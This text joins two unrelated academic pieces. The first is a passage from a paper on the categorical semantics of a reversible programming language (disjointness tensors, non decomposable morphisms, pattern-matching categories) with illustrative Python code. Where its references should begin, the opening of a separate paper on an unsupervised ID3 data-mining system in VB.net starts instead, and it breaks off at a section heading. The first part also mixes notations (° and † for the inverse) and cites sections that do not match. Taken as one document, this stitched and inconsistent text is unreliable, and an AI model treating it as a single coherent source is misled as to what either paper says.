One of the problems to overcome is the denotation of pairing and sums. If a standard categorical denotation for the former is a monoidal structure, the latter is usually represented with coproducts. Such a notion is however slightly insufficient. Indeed, for being able to join independent clauses in pattern-matching (as shown e.g. in Example 3.1), it has to interact well with the restriction structure. This led to the development of the disjointness tensor. Although Giles [34] was the first to introduce the notion of disjointness tensor, in this paper we rely on the definition of [30].

**Definition 4.1 (Disjointness tensor [30])** An inverse category \( C \) is said to have a disjointness tensor if it is equipped with a restriction bifunctor \( \oplus : C \times C \to C \), with a unit object \( 0 \) and total morphisms \( \iota_1 : A \to A \oplus B \) and \( \iota_2 : B \to A \oplus B \) such that \( \overline{\iota_1^\circ} \circ \overline{\iota_2^\circ} = 0_{A \oplus B, A \oplus B} \).
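In finite \( \text{PInj} \), the disjointness tensor is the disjoint union, and the condition of Definition 4.1 says that the ranges of the two injections do not overlap. A sketch under our dict encoding (the names are ours, not the paper's):

```python
def compose(g, f):
    """g ∘ f on finite partial injections encoded as dicts."""
    return {x: g[f[x]] for x in f if f[x] in g}

def bar(f):
    """f̄: the partial identity on dom(f)."""
    return {x: x for x in f}

def inv(f):
    """The partial inverse f°."""
    return {y: x for x, y in f.items()}

def oplus(f, g):
    """f ⊕ g on disjoint unions, tagging the left/right summand with 0/1."""
    out = {(0, a): (0, f[a]) for a in f}
    out.update({(1, c): (1, g[c]) for c in g})
    return out

def iota1(A):
    """ι₁ : A → A ⊕ B, a total injection into the left summand."""
    return {a: (0, a) for a in A}

def iota2(B):
    """ι₂ : B → A ⊕ B, a total injection into the right summand."""
    return {b: (1, b) for b in B}
```

Because the two injections tag their images differently, `compose(bar(inv(iota1(A))), bar(inv(iota2(B))))` is the empty dict, i.e. the zero morphism, as Definition 4.1 requires.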
**Lemma 4.2 ([34])** A disjointness tensor \( (\oplus, 0) \) in a category \( C \) gives rise to a structure of coproduct: for all objects \( A \) and \( B \) of \( C \), \( (A \oplus B, \iota_1, \iota_2) \) is a coproduct of \( A \) and \( B \).

To model the types of Section 2, we therefore essentially need a disjointness tensor and a monoidal structure. Similarly to what happens in the category \( \text{PInj} \), they need to be related through distributivity.

**Definition 4.3 ([31])** Let us consider a join inverse category equipped with a symmetric monoidal tensor product \( (\otimes, 1) \) and a disjointness tensor \( (\oplus, 0) \) that are join preserving, and such that there is an isomorphism \( \delta_{A,B,C} : A \otimes (B \oplus C) \to (A \otimes B) \oplus (A \otimes C) \). This is called a join inverse rig category.

**Example 4.4** The category \( \text{PId}_S^\circ \) is a join inverse rig category with the following structure:

- \( A \otimes B = A \times B \), the usual cartesian product. If \( f : A \to B \) and \( g : C \to D \), then we define \( \sigma_{f \otimes g}(a, c) = (\sigma_f(a), \sigma_g(c)) \) and \( X^{f \otimes g}_{(a,c)} = X^f_a \cap X^g_c \). The unit \( 1 \) is a singleton set.
- \( A \oplus B = A \uplus B \), the disjoint union. If \( f : A \to B \) and \( g : C \to D \), we define \( \sigma_{f \oplus g}(\iota_1(a)) = \iota_1(\sigma_f(a)) \), \( \sigma_{f \oplus g}(\iota_2(c)) = \iota_2(\sigma_g(c)) \), \( X^{f \oplus g}_{\iota_1(a)} = X^f_a \) and \( X^{f \oplus g}_{\iota_2(c)} = X^g_c \). The zero is the empty set.

Note how in \( \text{PId}_S^\circ \), if \( S \) is of cardinality at least 2, there are several morphisms \( 1 \to 1 \). In particular, a morphism \( 1 \to 1 \oplus 1 \) is not necessarily an injection.

4.2 Orthogonality between morphisms

In the description of the language, the definition of isos heavily relies on orthogonality. In this section we define this notion over morphisms in an inverse category.
General definitions of orthogonality in inverse categories exist, but we have chosen to manipulate a more practical one. The notion introduced below satisfies all the axioms set in [34] for orthogonality of morphisms. We shall see in this section that orthogonal values produce disjoint morphisms.

**Definition 4.5 (Disjointness)** Two morphisms \( f : A \to B \) and \( g : A \to C \) are disjoint iff \( \overline{f}\, \overline{g} = 0 \).

Intuitively, disjoint morphisms have an empty common domain of definition. We can then prove that some of the axioms of morphism orthogonality stated in [34] hold for disjointness, as expressed in the lemmas below.

**Lemma 4.6 (Left-composed disjointness)** Let \( f_1 : A \to B_1 \), \( f_2 : A \to B_2 \), \( g_1 : B_1 \to C_1 \), \( g_2 : B_2 \to C_2 \) be morphisms. If \( \overline{f_1}\, \overline{f_2} = 0 \), then \( \overline{g_1 f_1}\; \overline{g_2 f_2} = 0 \).

**Lemma 4.7 (Right-composed disjointness)** Let \( f : A \to B \), \( g : A \to C \), \( h : D \to A \) be morphisms. If \( \overline{f}\, \overline{g} = 0 \) then \( \overline{f h}\; \overline{g h} = 0 \).

**Lemma 4.8 (Disjoint compatibility)** If \( \overline{f_1}\, \overline{f_2} = 0 \) then \( f_1 \sim f_2 \).

This last lemma is very natural: if two morphisms apply on strictly different domains, they are compatible. It also underlines that disjointness is a sensible choice to picture orthogonality.

4.3 Semantics of types and values

In order to model the types of the language presented in Section 2, the most natural choice is to consider a join inverse rig category, capturing both the tensor and the sum-type. Let us then fix such a join inverse rig category \( C \). Each type \( \alpha \) is given an interpretation as an object in the category \( C \), written \( [\alpha] \). If a type \( \alpha \) has \( n \) constants, it is necessary to choose \( [\alpha] \) such that there are \( n \) morphisms \( f^\alpha_i : 1 \to [\alpha] \) (for \( i = 1, \ldots, n \)) that are total and pairwise disjoint, following Definition 4.5.
The set of these morphisms will be written \( S_\alpha \). A sequence of types is denoted with the tensor product of the interpretations: \( [\Delta] = [a_1] \otimes \cdots \otimes [a_n] \) whenever \( \Delta \equiv x_1 : a_1, \ldots, x_n : a_n \). We then define the semantics of values and terms by induction on their definition: we set \( [c_\alpha] = f^\alpha_i \in S_\alpha \) for \( c_\alpha \) the \( i \)-th constant of \( \alpha \). The typing judgment of variables gives the following denotation:

\[
[x : a \vdash x : a] = 1_{[a]} : [a] \to [a].
\]

Now let us consider \( f = [\Delta \vdash v : a] \). We have the following denotation:

\[
[\Delta \vdash \text{inj}_l\, v : a \oplus b] = \iota_1 \circ f,
\]

and similarly with \( \iota_2 \) for the right injection. If \( f = [\Delta_1 \vdash v_1 : a_1] \) and \( g = [\Delta_2 \vdash v_2 : a_2] \), we can define \( [\Delta_1, \Delta_2 \vdash \langle v_1, v_2 \rangle : a_1 \otimes a_2] = f \otimes g \). When \( \Delta_1 \) and \( \Delta_2 \) are empty, \( f \otimes g : 1 \otimes 1 \to [a_1] \otimes [a_2] \) will be identified with a morphism of type \( 1 \to [a_1] \otimes [a_2] \), since there is a total isomorphism between \( 1 \otimes 1 \) and \( 1 \).

**Remark 4.9** By abuse of notation, we shall write \( [v] \) in place of \( [\Delta \vdash v : a] \) when the context is clear.

The semantics of values \( v_1, v_2 \) of type \( a \) within contexts \( \Delta_1, \Delta_2 \) are morphisms \( [\Delta_i] \to [a] \). The interesting part in terms of orthogonality is the codomain of these morphisms: intuitively, if they were sets, we would want their images to be disjoint. This explains why the following lemma is stated on the partial inverses \( [v_i]^\circ : [a] \to [\Delta_i] \).

**Lemma 4.10 (Orthogonality)** If \( v_1 \perp v_2 \), then \( \overline{[v_1]^\circ}\; \overline{[v_2]^\circ} = 0 \), that is, \( [v_1]^\circ \) and \( [v_2]^\circ \) are disjoint.

Lemma 4.10 is proven by induction on the definition of orthogonality over values. It heavily relies on the fact that \( \overline{\iota_1^\circ}\, \overline{\iota_2^\circ} = 0 \), a property of our category \( C \) that we have settled with Definition 4.1.
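For variable-free clauses interpreted in finite \( \text{PInj} \), the constructions of Sections 3.4 and 4.4 become very concrete: each clause \( v \leftrightarrow v' \) denotes the singleton partial injection \( [v'] \circ [v]^\circ \), and an iso denotes the join (union of graphs) of its clauses. A sketch under that assumption, with our own encoding:

```python
def compose(g, f):
    """g ∘ f on finite partial injections encoded as dicts."""
    return {x: g[f[x]] for x in f if f[x] in g}

def bar(f):
    """f̄: the partial identity on dom(f)."""
    return {x: x for x in f}

def leq(f, g):
    """f ≤ g iff g ∘ f̄ = f (Definition 3.11)."""
    return compose(g, bar(f)) == f

def join(morphisms):
    """⋁ of a restriction compatible family: the union of the graphs."""
    out = {}
    for f in morphisms:
        for x, y in f.items():
            assert out.get(x, y) == y, "family is not restriction compatible"
            out[x] = y
    return out

def iso_denotation(clauses):
    """⋁_i [v_i'] ∘ [v_i]°: for closed patterns, each clause is a singleton map."""
    return join([{v: vp} for v, vp in clauses])
```

For instance, a Boolean negation iso with clauses `[("tt", "ff"), ("ff", "tt")]` denotes the bijection swapping the two constants, and each singleton clause morphism sits below it in the order of Definition 3.11.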
4.4 Iso semantics

The aim of this section is to build the denotation of isos:

\[
\vdash_\omega \{ v_1 \leftrightarrow v'_1 \mid \ldots \mid v_n \leftrightarrow v'_n \} : a \leftrightarrow b.
\]

Such a denotation should be a morphism \( [a] \to [b] \). It should directly depend on the denotation of the individual clauses, as hinted at in Example 3.1. Within the join inverse rig category \( C \), we aim at showing that \( [\omega] \circ [v_i] \) is equal to \( [v'_i] \circ [v_i]^\circ \circ [v_i] \). This shows that the morphisms that we need to join are of the form \( [v'_i] \circ [v_i]^\circ \): we thus need them to be compatible. Their compatibility is a direct conclusion of Lemmas 4.6, 4.8 and 4.10.

**Lemma 4.11** If \( v_1 \perp v_2 \) and \( v'_1 \perp v'_2 \), then \( [v'_1] \circ [v_1]^\circ \bowtie [v'_2] \circ [v_2]^\circ \).

**Definition 4.12** For a well-typed iso \( \{ v_1 \leftrightarrow v'_1 \mid \ldots \mid v_n \leftrightarrow v'_n \} \), thanks to the orthogonality constraints on clauses, the morphisms \( [v'_i] \circ [v_i]^\circ \) form a family of pairwise compatible morphisms. We can rely on it to build the semantics of isos as

\[
[\vdash_\omega \{ v_1 \leftrightarrow v'_1 \mid \ldots \mid v_n \leftrightarrow v'_n \} : a \leftrightarrow b] = \bigvee_i [v'_i] \circ [v_i]^\circ : [a] \to [b].
\]

We can finally define the denotational semantics of the remaining terms of the language. Let \( F \) be the denotation \( [\vdash_\omega \omega : a \leftrightarrow b] \) and \( g \) be \( [\vdash_v t : a] \). Then \( [\vdash_v \omega\, t : b] \) is \( F \circ g \).

4.5 Towards soundness

In order to validate the semantics, a standard expected result is soundness: the fact that whenever \( t \to t' \) we also have \( [t] = [t'] \). The main difficulty lies in the denotation of \( \omega\, t \) from Definition 4.12. Indeed, suppose that \( \omega : a \leftrightarrow b \) is defined as \( \{ v_1 \leftrightarrow v'_1 \mid v_2 \leftrightarrow v'_2 \} \).
Whenever a closed term \( t \) of type \( a \) reduces to \( w \), and \( \omega\, w \) reduces, thanks to the safety properties we know that there exist some \( i \) and a valuation \( \sigma \) such that \( \sigma[v_i] = w \) and \( \omega\, t \to^* \sigma(v'_i) \). We therefore need \( [\omega\, t] \) to be equal to \( [\sigma(v'_i)] \), that is, since we should have \( [t] = [w] \) if we had soundness,

\[
\Big( \bigvee_j [v'_j] \circ [v_j]^\circ \Big) \circ [w] = [v'_i] \circ [v_i]^\circ \circ [w]. \tag{12}
\]

This amounts to asking that the pattern-matching carries over joins in the category. In the literature [36,37,34,23,31], the problem is solved by capitalizing on sum-like monoidal tensors, in particular the disjointness tensor of Giles [34]. As sketched in [31], one can follow the following strategy. First, one makes sure that the denotation maps all types to objects of the form \( 1 \oplus \cdots \oplus 1 \). Then, capitalizing on the structure of the language, one shows that the only morphisms of type \( 1 \to 1 \oplus \cdots \oplus 1 \) representable in the language are coproduct injections. The behavior of the pattern-matching is then categorically mimicked, getting Equation (12) directly from the properties of the injections. However, as for instance in the category \( \text{PId}_S^\circ \) of Example 4.4, in general join inverse rig categories morphisms of type \( 1 \to 1 \oplus \cdots \oplus 1 \) are not necessarily injections. This calls for a weaker condition, independent from the coproduct. This is the subject of the next section.

5 Pattern-matching categories

As discussed in Section 4.5, the denotation of an iso is a join of several morphisms, each mapping a particular pattern to its image through the iso. In the operational semantics, the "choice" of the pattern rests on the notion of orthogonality of values: indeed, if a value matches a pattern, this value is necessarily orthogonal to the other patterns.
This is ensured by the straightforward definition of orthogonality. We have presented in Section 4.5 a way to transfer this notion of orthogonality to morphisms in join inverse rig categories, based on the structure of the disjointness tensor. In this section, we discuss a notion of categorical pattern-matching independent from disjointness tensors, in particular generalizing the approach of [34,31]. This is the main contribution of the paper.

**Example 5.1** To illustrate our approach, consider a language only consisting of (1) tensors and (2) the enum types \( \alpha = \{e_\alpha\} \) and \( \beta = \{c_\beta, d_\beta, e_\beta\} \). Let us then consider the full subcategory of \( \text{PInj} \) whose objects are the sets whose cardinality is a power of 3. This subcategory can serve as a sound model of the language, including the pattern-matching. Note how the handling of the pattern-matching is independent from any disjointness tensor, as the category does not feature coproducts.

5.1 Non decomposability and pattern-matching categories

Concretely, in order to get pattern-matching, we manipulate expressions of the form \( (f \vee g)h \), and the idea is to find a property of \( h \) which would lead to \( (f \vee g)h \) being equal to either \( fh \) or \( gh \), without having to rely on coproduct injections. For this matter, we introduce several definitions of non decomposability, roughly meaning that the morphism cannot be written as a join.

**Definition 5.2 (Strongly non decomposable)** A morphism \( h : A \to B \) in a join inverse category is called strongly non decomposable (snd) when if \( h = f \vee g \) with \( f, g : A \to B \), then \( f = 0 \) or \( g = 0 \).

**Definition 5.3 (Linearly non decomposable)** A morphism \( h : A \to B \) in a join inverse category is called linearly non decomposable (lnd) when if \( f \leq h \) and \( g \leq h \) with \( f, g : A \to B \), then \( f \leq g \) or \( g \leq f \).
Definition 5.4 (Weakly non decomposable) A morphism \(h : A \to B\) in a join inverse category is called weakly non decomposable (wnd) when, if \(h = f \lor g\) with \(f, g : A \to B\), then \(f \leq g\) or \(g \leq f\).

Remark 5.5 Observe that \(\text{snd} \Rightarrow \text{lnd} \Rightarrow \text{wnd}\).

Although these definitions look alike, they differ significantly. A strongly non decomposable morphism does not have any morphism strictly below itself, except 0. Linear non decomposability, on the other hand, allows morphisms below \(h\), but requires them to be linearly ordered. Finally, the weak form gives very little information, as shown in the following example.

Example 5.6 (Weakly non decomposable morphism) Consider the subcategory of \(\text{PInj}\) with one object \(\{a, b, c\}\) and with the identity and the four partial isos: \(f\) of domain \(\{a, b\}\), \(g\) of domain \(\{a\}\), \(h\) of domain \(\{b\}\) and 0 of empty domain. This subcategory is a join inverse category. In this subcategory, the identity is weakly non decomposable: it cannot be written as a join that does not contain the identity itself. Nonetheless, the morphism \(f\) is decomposable: weak non decomposability is not downwards closed, contrary to the two other notions. Weak non decomposability therefore leads to very different results from the other notions.

Definition 5.7 (Pattern-matching) A weakly (resp. linearly, strongly) pattern-matching category \(C\) is a join inverse category in which, for all \(f, g \in \text{Hom}_C(A, B)\) and \(h \in \text{Hom}_C(C, A)\), if \(f \sim g\) and \(h\) is weakly (resp. linearly, strongly) non decomposable, then
\[(f \lor g)h = fh \quad \text{or} \quad (f \lor g)h = gh.\]
Note that we do not need the compatibility of the inverses to define the pattern-matching.
This straightforward definition of what we would like to have in our category is, however, difficult to grasp and manipulate; we therefore introduce an equivalent presentation: the correspondence between the two definitions is shown in Theorem 5.9.

Definition 5.8 (Consistency) A join inverse category is said to be weakly (resp. linearly, strongly) consistent when \(h : A \to B\) weakly (resp. linearly, strongly) non decomposable implies that, for every morphism \(f : B \to C\), the morphism \(fh\) is weakly (resp. linearly, strongly) non decomposable.

Theorem 5.9 A weakly (resp. linearly, strongly) consistent join inverse category is a weakly (resp. linearly, strongly) pattern-matching category.

Indeed, if a join \(f \lor g\) is composed with a non decomposable morphism \(h\), consistency ensures that \(fh \lor gh\) stays non decomposable. This means that it can only be one of the morphisms that form the join, which is exactly pattern-matching.

**Theorem 5.10** A weakly pattern-matching category is weakly consistent. \( \Box \)

This theorem validates the choices of definitions made above, and it underlines a strong link between pattern-matching and non decomposability. Notwithstanding, a join inverse category is not necessarily a weakly pattern-matching category:

**Example 5.11 (Not weakly consistent)** Consider the subcategory of \( \text{PInj} \) presented in Example 5.6. Although \( \text{id}_{\{a,b,c\}} \) is weakly non decomposable, the composition \( (g \lor h)\,\text{id}_{\{a,b,c\}} \) is equal to \( g \lor h = f \), which is different from both \( g \) and \( h \): the subcategory is not weakly consistent.

Thus, if we are willing to work with weak non decomposability, not every join inverse category can be used. As shown below, the notions of linear and strong non decomposability let us consider any join inverse category.
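To make the definitions concrete, here is a small Python sketch (our illustration, not part of the paper) of the subcategory of \(\text{PInj}\) from Example 5.6. Partial injections on \(\{a,b,c\}\) are represented as dicts, the join of compatible morphisms is the union of their graphs, and the assertions check both that the identity is weakly non decomposable within this hom-set and that weak consistency fails as in Example 5.11.

```python
def compose(f, g):
    """Composition f . g of partial injections (g is applied first)."""
    return {x: f[g[x]] for x in g if g[x] in f}

def compatible(f, g):
    """f and g agree where both are defined, and so do their inverses."""
    agree = all(f[x] == g[x] for x in f.keys() & g.keys())
    finv = {v: k for k, v in f.items()}
    ginv = {v: k for k, v in g.items()}
    return agree and all(finv[y] == ginv[y] for y in finv.keys() & ginv.keys())

def join(f, g):
    """Join of two compatible partial injections: union of their graphs."""
    assert compatible(f, g), "join is only defined for compatible morphisms"
    return {**f, **g}

# The five morphisms of the subcategory in Example 5.6.
zero = {}
g = {"a": "a"}                          # partial identity on {a}
h = {"b": "b"}                          # partial identity on {b}
f = {"a": "a", "b": "b"}                # g v h
ident = {"a": "a", "b": "b", "c": "c"}  # the identity on {a, b, c}
homset = [zero, g, h, f, ident]

# id is weakly non decomposable here: every join equal to id contains id
# itself (so the other joinand is below it).
for p in homset:
    for q in homset:
        if compatible(p, q) and join(p, q) == ident:
            assert p == ident or q == ident

# ...but the category is not weakly consistent (Example 5.11): composing
# the join g v h with the wnd morphism id gives f, which differs from
# both g.id and h.id, so pattern-matching fails.
assert join(g, h) == f
assert compose(join(g, h), ident) == f
assert compose(g, ident) != f and compose(h, ident) != f
```

The weak-non-decomposability check above only enumerates this finite hom-set; it is a sanity check of the example, not a general decision procedure.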
Of course, the complexity does not disappear: it simply moves from the definition of the category to the number of morphisms that we can consider, since linear and strong non decomposability are far more demanding properties than the weak one.

**Theorem 5.12** A join inverse category is strongly consistent. \( \Box \)

Even if it comes as no surprise, this result is interesting. Strong non decomposability is a very demanding property; but since it forces some morphisms to be equal to 0, composition naturally preserves the property.

**Example 5.13** A morphism in a join inverse category can be linearly non decomposable without being strongly non decomposable. Indeed, consider the (join inverse) subcategory of \( \text{PInj} \) whose only object is \( \{a,b\} \), with morphisms 0, \( \text{id} \) and \( f \), the partial identity whose domain is \( \{a\} \). Then we have \( 0 < f < \text{id}_{\{a,b\}} \). While it is linearly non decomposable, the identity is not strongly non decomposable.

Fortunately, we still have the following result:

**Theorem 5.14** A join inverse category is linearly consistent. \( \Box \)

**Remark 5.15** Linear non decomposability is thus the best property to consider for pattern-matching. In the context of pattern-matching categories, linearly non decomposable maps essentially correspond to "pure" values waiting to be matched against a set of "orthogonal" clauses, this orthogonality being captured by the compatibility of the morphisms representing the clauses.

5.2 The case of our language

The previous subsection developed a categorical theory of pattern-matching; we can now look at how it applies to the minimal language of Section 2, whose only base type is the unit type with one single constant. Its semantics in a join inverse rig category \( C \) is straightforwardly given by the identity \( \text{id}_1 \) over 1, the unit of the monoidal structure.
We are in the context of Section 4.5, where all closed values are denoted by morphisms \( 1 \rightarrow 1 \oplus \cdots \oplus 1 \), but where, in the category, morphisms of this type are in general not necessarily injections, and there may be more than one morphism \( 1 \rightarrow 1 \).

**Theorem 5.16 (Denotation of closed values)** In a join inverse rig category \( C \), if \( \text{id}_1 \) is weakly (resp. linearly, strongly) non decomposable, then the denotation of a closed value \( v \) of the minimal language is weakly (resp. linearly, strongly) non decomposable. \( \Box \)

Then, in any join inverse rig category with \( \text{id}_1 \) linearly (or strongly) non decomposable, in the context of Section 4 the previous results allow us to apply pattern-matching:
\[ \Big(\bigvee_{j} [v_j'] \circ [v_j]^\dagger\Big) \circ [v] \;=\; [v_i'] \circ [v_i]^\dagger \circ [v]. \]

**Example 5.17** Example 4.4 gives a nice way to picture an \( \text{id}_1 \) that is non-trivial. Suppose that \( S \) contains at least two elements. Then \( \text{id}_1 \) in \( \text{PId}_S^{\oplus} \) is not even weakly non decomposable. If instead we consider the subcategory \( \text{SubPId}_{\{a,b,c\}}^{\oplus} \) with \( S = \{a,b,c\} \), containing only the morphisms of \( \text{PId}_S \) corresponding to \( \{a\} \), \( \{a,b\} \) and \( \{a,b,c\} \), then \( \text{id}_1 \) is linearly non decomposable but not strongly so. Note how \( \text{SubPId}_{\{a,b,c\}}^{\oplus} \) is indeed a join inverse rig category, as the tensor is derived from the intersection on sets.

5.3 Soundness and adequacy

From Theorem 5.16 we can derive the fact that any join inverse rig category where \( \text{id}_1 \) is linearly non decomposable forms a sound and adequate model for the minimal language. The remaining results assume such an ambient semantics.

Lemma 5.18 (Substitution) In the minimal language, for any values \( \Delta \vdash v' : b \) and \( \Delta \vdash v : a \), and any substitution \( \sigma \) closing \( \Delta \), we have \( [\sigma(v')] = [v'] \circ [v]^\dagger \circ [\sigma(v)] \). \( \Box \)

Corollary 5.19 (Soundness) If \( t \to t' \), then \( [t] = [t'] \).
\( \Box \)

Definition 5.20 (Operational equivalence) Consider two terms \( t_1, t_2 \). We write \( t_1 \equiv t_2 \) whenever there exists a value \( v \) such that both \( t_1 \to^* v \) and \( t_2 \to^* v \).

Theorem 5.21 (Adequacy) If \( t_1 \) and \( t_2 \) are closed, well-typed terms, then \( t_1 \equiv t_2 \) iff \( [t_1] = [t_2] \).

6 Discussion and conclusion

Consider again Example 5.17. Following the technique presented in the literature [31], one could extract from the minimal language of Section 2 a subcategory of \( \text{PId}^{\oplus}_{\{a,b,c\}} \) able to capture a notion of pattern-matching. However, this approach does not tell us anything about the categorical structures required to capture it: the machinery presented in Section 5 aims at answering this question. In particular, we discussed in Example 5.17 the subcategory \( \text{SubPId}^{\oplus}_{\{a,b,c\}} \) of \( \text{PId}^{\oplus}_{\{a,b,c\}} \), in which the morphism \( \text{id}_1 \) is linearly non decomposable; Lemma 5.18 then shows that Equation (12) of Section 4.5 is correct in \( \text{SubPId}^{\oplus}_{\{a,b,c\}} \), while Theorem 5.21 guarantees that this subcategory is actually adequate: it strictly sits in between the image of the language and the whole category \( \text{PId}^{\oplus}_{\{a,b,c\}} \).

In general, although the notions of pattern-matching and linear non decomposability presented in this paper are sufficient to recover a notion of pattern-matching, the question of whether they are necessary remains open and is left as future work.

Acknowledgments

This work was supported in part by the French National Research Agency (ANR) under the research project SoftQPRO ANR-17-CE25-0009-02, by the DGE of the French Ministry of Industry under the research project PIA-GDN/QuantEx P163746-484124 and by the STIC-AmSud project Qapla' 21-SITC-10.

References
New Implementation of Unsupervised ID3 Algorithm (NIU-ID3) Using Visual Basic.net

FARAJ A. EL-MOUADIB1, ZAKARIA S. ZUBI2, AHMED A. ALHOUNI3
1Computer Science Department, Faculty of Information Technology, Garyounis University, Benghazi, Libya, <elmouadib@yahoo.com>
2Computer Science Department, Faculty of Science, Altahadi University, Sirte, Libya, <zszubi@yahoo.com>
3Computer Science Department, Faculty of Science, Altahadi University, Sirte, Libya, <a_a_m_alhouni@yahoo.com>

Abstract: Data volumes have increased noticeably in the past few years; for this reason, some researchers estimate that the volume of data doubles every year. Data mining thus seems to be the most promising solution to the dilemma of having too much data and very little knowledge. Database technology has evolved dramatically since the 1970s, and data mining has become an area of attraction as it promises to turn raw data into meaningful knowledge that businesses can use to increase their profitability. Data mining systems are classified according to a specific set of criteria: the kinds of databases mined, the kinds of knowledge mined, the kinds of techniques utilized, and the applications adapted. This classification can also help potential users to distinguish between data mining systems and to identify those that best match their specific needs. The purpose of this paper is to implement one of the data mining techniques (classification) to deal with labeled data sets, merged with another data mining technique (clustering) to deal with unlabeled data sets, in a computer system written in VB.net 2005. Our system, NIU-ID3, can deal with two types of data files, namely text data files and Access database files. It can also preprocess unlabeled data (clustering of data objects) and process labeled data (classification).
NIU-ID3 can discover knowledge in two different forms, namely decision trees and decision rules (classification rules). The approach is implemented in the Visual Basic.net language with SQL. The system has been tested with Access databases and text data (labeled and unlabeled data sets) and presents its results in the form of decision trees, decision rules or simplified rules.

Key Words: Data mining, Data classification, ID3 algorithm, Supervised learning, Unsupervised learning, Decision tree, Clustering analysis.

1 Introduction

Dealing with the huge amounts of data produced by businesses has brought about the concept of information architecture, which started new projects such as Data Warehousing (DW). The purpose of DW is to provide users and analysts with an integrated view of all the data of a given enterprise. Data Mining (DM) and Knowledge Discovery in Databases (KDD) form one of the fastest growing fields of computer science. Their popularity and importance are driven by an increased demand for analysis tools that help analysts and users to use, understand and benefit from these huge amounts of data.

One theme of knowledge discovery is to gain general ideas from specific ones, which is the basic idea of learning. Machine learning is a subfield of artificial intelligence that deals with programs that learn from experience. Concept learning can be defined as inducing a general description of a category given some positive and negative examples of it. So, it is the automatic inference of a general definition of some concept, given examples labeled as members or non-members of the concept. "The aim of concept learning is to induce a general description of a concept from a set of specific examples." [1]. One of the capabilities of human cognition is the skill to learn concepts from examples: humans have a remarkable ability for concept learning with the help of only a small number of positive examples of a concept.
As concept learning problems became more complex, more expressive representation languages became necessary. According to [1], most concept learning systems use an attribute-value language, where the data (examples) and the output (concepts) are represented as conjunctions of attribute-value pairs. "Concept Learning is inferring a Boolean-valued function from training examples of its input and output." [5]. This simplicity of representation allowed efficient learning systems to be implemented; on the other hand, it made it difficult to induce descriptions involving complex relations. "Inductive Learning, a kind of learning method, has been applied extensively in machine learning." [2]. Current machine learning paradigms are divided into two groups: learning with a teacher, called supervised learning, and learning without a teacher, called unsupervised learning.

According to [6], data mining is the process of discovering meaningful new correlations, patterns and trends by sifting through large amounts of data stored in repositories, using pattern recognition technologies as well as statistical and mathematical techniques. Data mining is considered to be a revolution in information processing, and there are many definitions in the literature of what constitutes data mining. According to [5], the attraction of the wide use of data mining is due to:

- The availability of very large databases.
- The massive use of new techniques coming from other disciplines of the computer science community, like neural networks, decision trees and induction rules.
- Commercial interest in proposing individual solutions to targeted clients.
- New software packages, more user-friendly, with attractive interfaces, directed as much towards decision makers as professional analysts, but much more expensive.
The main objective of DM is to use the discovered knowledge to explain current behavior, predict future outcomes, or provide support for business decisions. Data mining enables corporations and government agencies to analyze massive volumes of data quickly and relatively inexpensively. Today, mining can be performed on many types of data, including those in structured, textual, spatial, Web, or multimedia forms. "Data mining is the process of discovering advantageous patterns in data." [7]. Most data mining methods (techniques) are based on well-tested techniques from machine learning, pattern recognition, and statistics: classification, clustering, regression, etc. Data mining techniques are applicable to a wide variety of problem areas. Some of these techniques are:

- **Classification** is a supervised technique that maps (classifies) data objects into one of several predefined classes, i.e. given an object and its input attributes, the classification output is one of the possible mutually exclusive classes. The aim of the classification task is to discover some kind of relationship between the input attributes and the output class, so that the discovered knowledge can be used to predict the class of a new, unknown object.
- **Regression** is a supervised learning technique used to build a more or less transparent model, where the output is a continuous numerical value or a vector of such values rather than a discrete class.
- **Clustering** is an unsupervised learning technique which aims at finding clusters of similar objects sharing a number of interesting properties.
- **Dependency modeling** consists of discovering a model which describes significant dependencies among attributes.
- **Change and deviation detection** focuses on discovering the most significant changes or deviations in the data between its actual content and its expected content (previously measured) or normative values.
- **Summarization** aims at producing compact and characteristic descriptions for a given set of data. It can take multiple forms: numerical (simple descriptive statistical measures like means, standard deviations, ...), graphical (histograms, scatter plots, ...), or "if-then" rules.

2 Supervised learning

Supervised learning is a learning process that is supplied with a set of examples, each consisting of the input data along with the correct output (class). "The supervised learning paradigm employs a teacher in the machine learning process." [3]. Some examples of well-known supervised learning models include back propagation in neural networks, K-nearest neighbor, minimum entropy, and decision trees.

3 Unsupervised learning

In unsupervised learning there is no teacher, nor is the data pre-classified. The algorithm is never given a training set and is basically left on its own to classify its inputs. "The unsupervised learning paradigm has no external teacher to oversee the training process, and the system forms (natural groupings) of the input patterns." [3]. One of the most well-known unsupervised methods is clustering. In unsupervised learning, the final result reflects the input data in a more objective manner; the disadvantage of such a learning process is that the obtained classes do not necessarily have a subjective meaning.

4 Classification and decision trees

A decision tree is a classification scheme that can be used to produce classification rules. In this section we review some basic ideas of classification and the development of decision tree algorithms. The theoretical and practical aspects of the ID3 algorithm are presented and its features explained in detail, along with the way to deal with continuous-valued attributes. The design and implementation of our system are demonstrated as well.
Our system is an unsupervised version of ID3, developed using Visual Basic.Net.

4.1 Classification background

With enormous amounts of data stored in databases and data warehouses, it is increasingly important to develop powerful tools for data analysis, to turn such data into useful knowledge that can be used in decision-making. One of the most well-studied data mining functionalities is classification, due to its wide use in many domains. "Classification is an important data mining problem. Given a training database of records, each tagged with a class label." [8]. The classification task is, as a first step, to build a model (classifier) from the given data (pre-classified data objects) and, as a second step, to use the model to predict or classify unknown data objects.

The aim of a classification problem is to classify transactions into one of a discrete set of possible categories. The input is a structured database comprised of attribute-value pairs. Each row of the database is a transaction and each column is an attribute taking on different values. One of the attributes in the database is designated as the class attribute, the set of possible values for this attribute being the classes.

Classification is a data mining technique that typically involves three phases: a learning phase, a testing phase and an application phase. The learning model, or classifier, is built during the learning phase. It may be in the form of classification rules, a decision tree, or a mathematical formula. Since the class label of each training sample is provided, this approach is known as supervised learning. In the testing phase, test data are used to assess the accuracy of the classifier. If the classifier passes the test phase, it is used for the classification of new, unclassified data tuples. In the application phase, the classifier predicts the class label for these new data objects.
According to [2], classification has been applied in many fields, such as medical diagnosis, credit approval, customer segmentation and fraud detection. There are several techniques (methods) of classification:

- Classification by decision tree induction, such as the ID3 (Iterative Dichotomiser 3), C4.5, SLIQ, SPRINT and RainForest algorithms.
- Bayesian classification, by the use of Bayes' theorem.
- Classification by back propagation, in the area of neural networks.
- Classification based on concepts from association rule mining.
- Other classification methods: KNN classifiers, case-based reasoning, genetic algorithms, the rough set approach, fuzzy set approaches.

4.2 The decision tree algorithm

